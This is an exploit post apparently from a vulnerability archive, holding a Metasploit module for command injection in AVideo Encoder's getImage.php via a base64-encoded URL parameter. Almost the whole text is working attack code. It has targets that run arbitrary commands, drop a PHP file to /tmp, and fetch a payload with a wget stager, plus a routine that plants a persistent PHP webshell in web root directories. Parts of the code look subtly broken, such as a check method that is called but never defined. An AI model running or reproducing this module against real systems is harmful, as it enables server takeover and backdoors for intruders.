======================================================================================================================
| # Title     : AVideo versions prior to 7.0 Metasploit Module Command Injection                                     |
| # Author    : indoushka                                                                                            |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                     |
| # Vendor    : https://www.avideo.com/                                                                              |
======================================================================================================================

[+] Summary    : The Metasploit exploit module targets a command injection vulnerability in AVideo  
				 This module exploits a base64-encoded command injection flaw in AVideo Encoder’s image processing endpoint, turning a simple URL parameter into remote code execution with multiple payload strategies.
[+] POC   :  

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AVideo Encoder getImage.php Command Injection',
      'Description'    => %q{
        Command injection in AVideo via base64Url parameter.
      },
      'Author'         => ['indoushka'],
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix', 'linux', 'php'],
      'Arch'           => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
      'Targets'        => [
        ['Unix Command', { 'Type' => :unix_cmd }],
        ['PHP Command',  { 'Type' => :php_cmd }],
        ['Linux Dropper',{ 'Type' => :linux_dropper }]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2020-10-15'
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
      OptString.new('WEBSHELL_NAME', [false, 'Webshell name', 'shell.php']),
      OptBool.new('UPLOAD_WEBSHELL', [false, 'Upload webshell', false])
    ])

    register_advanced_options([
      OptInt.new('Delay', [false, 'Delay', 1])
    ])
  end

  def execute_command(cmd)
    payload = build_payload(cmd)

    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'Encoder', 'objects', 'getImage.php'),
        'vars_get' => {
          'base64Url' => payload,
          'format'    => 'png'
        },
        'timeout' => datastore['TIMEOUT']
      })

      return res&.body
    rescue ::Rex::ConnectionError
      return nil
    end
  end

  def build_payload(cmd)
    injected = "http://test.com/`#{cmd}`"
    Rex::Text.encode_base64(injected)
  end

  def exploit
    unless datastore['ForceExploit'] || check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    end

    print_status("Exploiting...")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)  
    when :php_cmd
      execute_php_payload
    when :linux_dropper
      execute_cmdstager
    end

    upload_webshell if datastore['UPLOAD_WEBSHELL']
  end

  def execute_php_payload
    print_status("Executing PHP payload...")

    php_code = "<?php system($_GET['cmd']); ?>"
    tmp_file = "/tmp/#{Rex::Text.rand_text_alpha(6)}.php"

    execute_command("echo '#{php_code}' > #{tmp_file}")
    register_file_for_cleanup(tmp_file)

    sleep(datastore['Delay'])
    execute_command("php #{tmp_file}")
  end

  def execute_cmdstager
    print_status("Running cmdstager...")

    super(
      :delay => datastore['Delay'],
      :flavor => :wget,
      :temp   => '/tmp'
    )
  end

  def upload_webshell
    print_status("Uploading webshell...")

    webshell = datastore['WEBSHELL_NAME']
    code = "<?php system($_GET['cmd']); ?>"

    paths = [
      datastore['WritablePath'],
      '/var/www/html/',
      '/var/www/',
      './'
    ]

    paths.each do |p|
      next if p.nil? || p.empty?

      path = p.end_with?('/') ? p : p + '/'

      execute_command("echo '#{code}' > #{path}#{webshell}")
      sleep(datastore['Delay'])

      res = execute_command("ls #{path}#{webshell}")

      if res && !res.include?("No such file")
        print_good("Webshell likely uploaded: #{path}#{webshell}")
        break
      end
    end
  end

  def print_status(msg)
    super("[AVideo] #{msg}")
  end

  def print_good(msg)
    super("[AVideo] #{msg}")
  end

  def print_error(msg)
    super("[AVideo] #{msg}")
  end

  def print_warning(msg)
    super("[AVideo] #{msg}")
  end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================